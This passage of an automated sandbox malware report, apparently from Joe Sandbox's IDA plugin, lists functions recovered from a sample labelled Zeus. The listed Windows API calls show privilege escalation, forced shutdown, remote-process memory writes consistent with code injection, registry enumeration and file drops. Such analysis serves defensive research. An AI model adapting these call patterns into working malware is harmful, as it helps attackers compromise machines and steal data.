Part of subcall function 003C6A3C: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 003C6A77
Part of subcall function 003C6A3C: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 003C6A8E
Part of subcall function 003C6A3C: LocalFree.KERNEL32(00000000), ref: 003C6A9D

GetFileAttributesW.KERNEL32(003D23C8,003D25D0,003D25D0,00000000,00020000,003B69C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 003B5F46

Part of subcall function 003C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 003C28A1

Strings

.tmp, xrefs: 003B5F1D

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C89C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 003C89CD
GetFileAttributesW.KERNEL32(?,?,00000000,003CD261,?,?,?,?,?), ref: 003C89F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,003CD261,?,?,?,?,?), ref: 003C8A03

Strings

.exe, xrefs: 003C89C9

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BF367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 003BF3CC

Part of subcall function 003CD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 003CD34A
Part of subcall function 003CD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 003CD35D
Part of subcall function 003CD325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 003CD39B
Part of subcall function 003CD325: CharToOemW.USER32(?,?), ref: 003CD3B7
Part of subcall function 003CD325: CharToOemW.USER32(?,?), ref: 003CD3C6
Part of subcall function 003CD325: ExitProcess.KERNEL32(00000000), ref: 003CD41C

Part of subcall function 003BE959: CreateMutexW.KERNELBASE(003D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,003B4E69,?,?,?,743C152E,00000002), ref: 003BE97F

ExitWindowsEx.USER32(00000014,80000000), ref: 003BF3DF

Part of subcall function 003C4A87: GetCurrentThread.KERNEL32(00000020,00000000,003CC9A1,00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A97
Part of subcall function 003C4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A9E
Part of subcall function 003C4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,003CC9A1,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4AB0
Part of subcall function 003C4A87: LookupPrivilegeValueW.ADVAPI32(00000000,003CC9A1,?), ref: 003C4AD4
Part of subcall function 003C4A87: AdjustTokenPrivileges.ADVAPI32(003CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 003C4AE9
Part of subcall function 003C4A87: GetLastError.KERNEL32 ref: 003C4AF3
Part of subcall function 003C4A87: CloseHandle.KERNEL32(003CC9A1), ref: 003C4B02

Strings

SeShutdownPrivilege, xrefs: 003BF3AB
, xrefs: 003BF383

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C1E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 003C1E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 003C1E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 003C1E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 003C1E3D, 003C1E42, 003C1E59

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00411DBB,00000000,004122ED), ref: 00414BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00411DBB,00000000,004122ED), ref: 00414BDF

Strings

IsWow64Process, xrefs: 00414BD9
kernel32.dll, xrefs: 00414BCA

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,003C1DBB,00000000,003C22ED), ref: 003C4BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,003C1DBB,00000000,003C22ED), ref: 003C4BDF

Strings

kernel32.dll, xrefs: 003C4BCA
IsWow64Process, xrefs: 003C4BD9

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041AAB6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24

APIs

InternetCloseHandle.WININET(?), ref: 0041AABD

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

EnterCriticalSection.KERNEL32(00423F24), ref: 0041AAD5
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041AAEB

Part of subcall function 00419CD9: CloseHandle.KERNEL32(?), ref: 00419CEC

Strings

$?B, xrefs: 0041AACF

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CA24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA265
SetEvent.KERNEL32(?), ref: 003CA286
LeaveCriticalSection.KERNEL32(003D3F24), ref: 003CA28D

Strings

3, xrefs: 003CA256

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00410AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CB5

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Part of subcall function 00414660: CryptAcquireContextW.ADVAPI32(00418C87,00000000,00000000,00000001,F0000040,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414679
Part of subcall function 00414660: CryptCreateHash.ADVAPI32(00418C87,00008003,00000000,00000000,00000030,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414691
Part of subcall function 00414660: CryptHashData.ADVAPI32(00000030,00000010,00418C87,00000000,?,00418C87), ref: 004146AD
Part of subcall function 00414660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00418C87), ref: 004146C5
Part of subcall function 00414660: CryptDestroyHash.ADVAPI32(00000030,?,00418C87), ref: 004146DC
Part of subcall function 00414660: CryptReleaseContext.ADVAPI32(00418C87,00000000,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 004146E6

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C0AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 003C0CB5

Part of subcall function 003C3346: HeapAlloc.KERNEL32(00000008,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?,?), ref: 003C3368
Part of subcall function 003C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?), ref: 003C3379

Part of subcall function 003C4660: CryptAcquireContextW.ADVAPI32(003C8C87,00000000,00000000,00000001,F0000040,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C4679
Part of subcall function 003C4660: CryptCreateHash.ADVAPI32(003C8C87,00008003,00000000,00000000,00000030,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C4691
Part of subcall function 003C4660: CryptHashData.ADVAPI32(00000030,00000010,003C8C87,00000000,?,003C8C87), ref: 003C46AD
Part of subcall function 003C4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,003C8C87), ref: 003C46C5
Part of subcall function 003C4660: CryptDestroyHash.ADVAPI32(00000030,?,003C8C87), ref: 003C46DC
Part of subcall function 003C4660: CryptReleaseContext.ADVAPI32(003C8C87,00000000,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C46E6

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A159
RegCloseKey.ADVAPI32(?), ref: 0040A28F

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

Part of subcall function 00417595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00419E26,?,?), ref: 004175AD

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040A27C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BA088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 003BA12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 003BA159
RegCloseKey.ADVAPI32(?), ref: 003BA28F

Part of subcall function 003C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,003B7194,?,?,00000104,.exe,00000000), ref: 003C74F4
Part of subcall function 003C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003B7194,?,?,00000104), ref: 003C7575

Part of subcall function 003C7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,003C9E26,?,?), ref: 003C75AD

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 003BA27C

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040A61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A6D5
RegCloseKey.ADVAPI32(?), ref: 0040A80C

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

Part of subcall function 00417595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00419E26,?,?), ref: 004175AD

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040A7F9

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BA61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 003BA6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 003BA6D5
RegCloseKey.ADVAPI32(?), ref: 003BA80C

Part of subcall function 003C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,003B7194,?,?,00000104,.exe,00000000), ref: 003C74F4
Part of subcall function 003C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003B7194,?,?,00000104), ref: 003C7575

Part of subcall function 003C7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,003C9E26,?,?), ref: 003C75AD

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 003BA7F9

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041B265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041B28C

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041B2E0

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0041B343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0041B36F

Part of subcall function 0041B3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0041B437
Part of subcall function 0041B3EC: WriteFile.KERNEL32(0041B3D4,?,00000146,?,00000000), ref: 0041B475
Part of subcall function 0041B3EC: WriteFile.KERNEL32(0041B3D4,?,00000000,?,00000000), ref: 0041B499
Part of subcall function 0041B3EC: FlushFileBuffers.KERNEL32(0041B3D4), ref: 0041B4AD
Part of subcall function 0041B3EC: CloseHandle.KERNEL32(0041B3D4), ref: 0041B4B6

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CB265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003CB28C

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 003CB2E0

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 003CB343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 003CB36F

Part of subcall function 003CB3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 003CB437
Part of subcall function 003CB3EC: WriteFile.KERNEL32(003CB3D4,?,00000146,?,00000000), ref: 003CB475
Part of subcall function 003CB3EC: WriteFile.KERNEL32(003CB3D4,?,00000000,?,00000000), ref: 003CB499
Part of subcall function 003CB3EC: FlushFileBuffers.KERNEL32(003CB3D4), ref: 003CB4AD
Part of subcall function 003CB3EC: CloseHandle.KERNEL32(003CB3D4), ref: 003CB4B6

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00417D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(00400000,?), ref: 00417D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00417D4E
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00400000,?,?,00000000,?,00000000), ref: 00417DE0

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,00000000,?,00000000), ref: 00417E05

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00412542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 00417D14: IsBadReadPtr.KERNEL32(00400000,?), ref: 00417D30
Part of subcall function 00417D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00417D4E
Part of subcall function 00417D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00400000,?,?,00000000,?,00000000), ref: 00417DE0
Part of subcall function 00417D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,00000000,?,00000000), ref: 00417E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00412574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125CB

Part of subcall function 00411D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 00411D3B
Part of subcall function 00411D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,004125E9,00000000,?,?,?,?,0041316D,?), ref: 00411D4F
Part of subcall function 00411D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00411D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0041316D,?,00000000), ref: 0041261A

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 00419874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,004085BE,?,?), ref: 004198C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,004085BE,?,?), ref: 004198D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,004085BE,?,?), ref: 00419909

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(003B15B0,00000000,00004401,003B15A0,?), ref: 003C9874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,003B85BE,?,?), ref: 003C98C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,003B85BE,?,?), ref: 003C98D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,003B85BE,?,?), ref: 003C9909

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00419372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 004186BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 004186D4

Part of subcall function 0041869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004186B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 004193F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0041940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00419430
FlushFileBuffers.KERNEL32(?), ref: 00419438

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C9372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 003C86BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 003C86D4

Part of subcall function 003C869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 003C86B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 003C93F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 003C940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 003C9430
FlushFileBuffers.KERNEL32(?), ref: 003C9438

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00405B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00405B40

Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DD9
Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DE2

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00405B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405BD6
TerminateProcess.KERNEL32(?,00000000), ref: 00405BE3

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B5B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 003B5B40

Part of subcall function 003C4DCA: CloseHandle.KERNEL32(00000000), ref: 003C4DD9
Part of subcall function 003C4DCA: CloseHandle.KERNEL32(00000000), ref: 003C4DE2

Part of subcall function 003C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 003C28A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 003B5B9A
